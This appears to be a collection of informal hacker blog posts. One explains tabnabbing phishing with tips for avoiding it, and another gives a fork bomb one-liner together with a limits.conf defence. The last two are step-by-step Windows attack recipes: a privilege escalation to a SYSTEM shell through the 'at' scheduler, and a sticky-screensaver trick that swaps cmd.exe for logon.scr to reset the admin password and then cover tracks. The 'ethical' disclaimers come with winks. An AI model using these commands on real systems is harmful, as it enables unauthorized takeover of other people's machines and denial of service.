T@b N@pp!ng — $tr@nge Ph!sh!ng @tt@ck

Now a days we are spending more money online than from our wallets. And with our bank account access credentials anyone can wipe out our account online. These reasons led fraudsters to find more and more phishing attacks and innocent individuals getting bankrupted.

The most common way that we all know is with phishing mails having links to fake sites. But most of us can apparently neglect fake links which made phishing scammers more difficult to steal credentials. But there are some creative programmers who made it possible to hack credentials without even user clicking links. Its known as tab napping.
Tab napping is a brilliant way of stealing credentials from users.
So how does it work??
When u are accessing mutiple tabs in ur browser, attacker can reload any inactive tab with his fake page looking as exactly as our bank account login page. wen we switch across tabs we dnt really care abt the url. So if when we find bank login page again though we logged in long bak, obviously we ll think that session has expired and we ll relogin again. Indirectly inputting our credentials to the attacker which is more equivalent to giving all our cash to him.

some ways to prevent..

• Dont use multiple tabs when accessing bank accounts.
• Do cross check the url before typing ur credentials.

Perceptions can be deceptive. What u see might not be wat u actually want to see.. 🙂 Beware!

$ecure $y$tem from F0rkB0mb

hey guys,

We all would have heard about forkbomb, a simple program which if executed, consumes your system resources until ur system crashes.  Shell script implementing fork bomb can be written in 11 characters.

!(){ !|!& };!

Where ! denotes the function name and !|! calls itself and pipes the output to the another call of  ! itself.

& makes the child to run back and it can never die and keep replicating until ur system crashes with the lack of resources.

; terminates the function.

! will inturn call the function ! aka fork().

Any users of ur system can run this command and make it crash. But still we have a way to secure our system from our users and groups. Thats by, restricting no of process an user can run at an instant.

We can specify this info in the file named limits.conf (/etc/security/limits.conf)

username hard nproc 200

groupname hard nproc 200

where nproc represents no of processes. Similarly we can limit no of logins and no of opened files for an user and so on..

Pr!v!lege E$c@l@t!on !n XP

Hey Guys,

We have seen how to change Admin’s password in few mins without any tracks, in my recent post. Now lets see how we can get Admin access in the system without changing his password. The only prerequisite is, the user should have access to the scheduler from cmd. Check this by typing “at” Command in cmd. If  it responds “Access denied” we cant go further. Any other response is a green signal.  Follow the following few steps.

Step 1: Create a Schedule. See ur system time and set schedule after 2 mins to run “cmd.exe”

Command “at hh::mm /interactive  “cmd.exe””

Step 2: Before u reach that time, goto task manager(ctrl+shift+esc) and kill “explorer.exe”

Step 3: Once u reach that time u ll get a command prompt. Then start explorer with that using Command “explorer.exe”

Step 4: Now wat u r seeing is the desktop of “System” user who is equivalent to “root” user in unix.

Enjoy guys..

Note: This post is only for ethical individuals 😉

Hack Admin Password in W!nd()w$

Hey guys,

This post helps you to change your Admin password in Windows. By the way this post is only for ethical individuals ;). All you have to do is open Command prompt and type the following commands.

c:

cd windows\system32

mkdir bkup

copy logon.scr \bkup\logon.scr

copy cmd.exe \bkup\cmd.scr

del logon.scr

rename cmd.exe logon.scr

exit

Wat u have done is, took backup of two files and renamed ur cmd as logon.scr. So whenevr ur OS try to load screensaver, it ll give you an unprotected cmd prompt. Dude wat are you waitng for? you got a prompt with admin privileges, change admin password.

net user username password

where username is the admin username and the password is of your choice ;).

Now login as admin and perform your tasks. Copy back two files into system32 to cover ur tracks.